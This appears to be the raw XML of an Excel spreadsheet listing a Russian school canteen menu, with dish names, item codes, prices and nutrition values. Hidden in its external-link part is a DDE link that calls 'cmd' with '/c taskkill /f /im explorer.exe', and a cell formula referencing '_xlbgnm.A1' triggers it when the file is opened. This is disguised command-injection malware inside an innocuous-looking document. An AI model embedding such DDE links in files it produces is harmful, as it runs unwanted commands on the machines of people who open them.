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FAEB636-0928-4D13-8A36-E74E574496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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="50" uniqueCount="49">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Б000086</t>
  </si>
  <si>
    <t>Б000002</t>
  </si>
  <si>
    <t>Хлеб ржаной(пшеничный)</t>
  </si>
  <si>
    <t>ДП00208</t>
  </si>
  <si>
    <t>Салат из отв.свеклы с чесноком</t>
  </si>
  <si>
    <t>ДП00232</t>
  </si>
  <si>
    <t>ДП00056</t>
  </si>
  <si>
    <t>Чай с лимоном и сахаром</t>
  </si>
  <si>
    <t>Б000120</t>
  </si>
  <si>
    <t>Плов из птицы(грудка)2ВАР</t>
  </si>
  <si>
    <t>ДП00301</t>
  </si>
  <si>
    <t>Салат из моркови по-корейски(1в)</t>
  </si>
  <si>
    <t>ДП00002</t>
  </si>
  <si>
    <t>Борщ со свежей капустой и картофелем</t>
  </si>
  <si>
    <t>ДП00071</t>
  </si>
  <si>
    <t>Напиток лимонный</t>
  </si>
  <si>
    <t>ДП00177</t>
  </si>
  <si>
    <t>Биточки из мяса ц/б с соусом</t>
  </si>
  <si>
    <t>А000062</t>
  </si>
  <si>
    <t>Каша Артек жидкая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</si>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</sst>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ddeLink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ddeService="cmd" ddeTopic="/c taskkill /f /im explorer.exe &gt;nul">
    <ddeItems>
      <ddeItem name="_xlbgnm.A1" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
    </ddeItems>
  </ddeLin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210</v>
      </c>
      <c r="F4" s="25">
        <v>47.48</v>
      </c>
      <c r="G4" s="15">
        <v>371</v>
      </c>
      <c r="H4" s="15">
        <v>20.883299999999998</v>
      </c>
      <c r="I4" s="15">
        <v>17.5</v>
      </c>
      <c r="J4" s="16">
        <v>51.45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4.79</v>
      </c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40</v>
      </c>
      <c r="F6" s="26">
        <v>5.6</v>
      </c>
      <c r="G6" s="17">
        <v>68</v>
      </c>
      <c r="H6" s="17">
        <v>0.1333</v>
      </c>
      <c r="I6" s="17">
        <v>4.6666999999999996</v>
      </c>
      <c r="J6" s="18">
        <v>6</v>
      </c>
    </row>
    <row r="7" spans="1:10" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A7" s="7"/>
      <c r="B7" s="2"/>
      <c r="C7" s="38" t="s">
        <v>38</v>
      </c>
      <c r="D7" s="35" t="s">
        <v>39</v>
      </c>
      <c r="E7" s="17">
        <v>50</v>
      </c>
      <c r="F7" s="26">
        <v>6.57</v>
      </c>
      <c r="G7" s="17">
        <v>28</v>
      </c>
      <c r="H7" s="17">
        <v>0.01</v>
      </c>
      <c r="I7" s="17">
        <v>0.01</v>
      </c>
      <c r="J7" s="18">
        <v>3.1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4.3600000000000003</v>
      </c>
      <c r="G12" s="21">
        <v>58.8</v>
      </c>
      <c r="H12" s="21">
        <v>1.62</v>
      </c>
      <c r="I12" s="21">
        <v>4.32</v>
      </c>
      <c r="J12" s="22">
        <v>13.32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7.49</v>
      </c>
      <c r="G13" s="17">
        <v>216.15379999999999</v>
      </c>
      <c r="H13" s="17">
        <v>7.3076999999999996</v>
      </c>
      <c r="I13" s="17">
        <v>6.2308000000000003</v>
      </c>
      <c r="J13" s="18">
        <v>16.615400000000001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>
        <v>45.41</v>
      </c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>
        <v>6.8</v>
      </c>
      <c r="G15" s="17">
        <v>150.83330000000001</v>
      </c>
      <c r="H15" s="17">
        <v>2.5832999999999999</v>
      </c>
      <c r="I15" s="17">
        <v>7.5833000000000004</v>
      </c>
      <c r="J15" s="18">
        <v>35.083300000000001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180</v>
      </c>
      <c r="F16" s="26">
        <v>3.63</v>
      </c>
      <c r="G16" s="17">
        <v>66.599999999999994</v>
      </c>
      <c r="H16" s="17">
        <v>5.3999999999999999E-2</v>
      </c>
      <c r="I16" s="17">
        <v>8.9999999999999993E-3</v>
      </c>
      <c r="J16" s="18">
        <v>16.515000000000001</v>
      </c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30</v>
      </c>
      <c r="F17" s="26">
        <v>2.89</v>
      </c>
      <c r="G17" s="17">
        <v>70.5</v>
      </c>
      <c r="H17" s="17">
        <v>1.65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1.96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 t="e">
        <f>[1]!_xlbgnm.A1</f>
        <v>#REF!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2023-01-26T15:15:03Z</dcterms:modified>
</cp:coreProperties>
</file>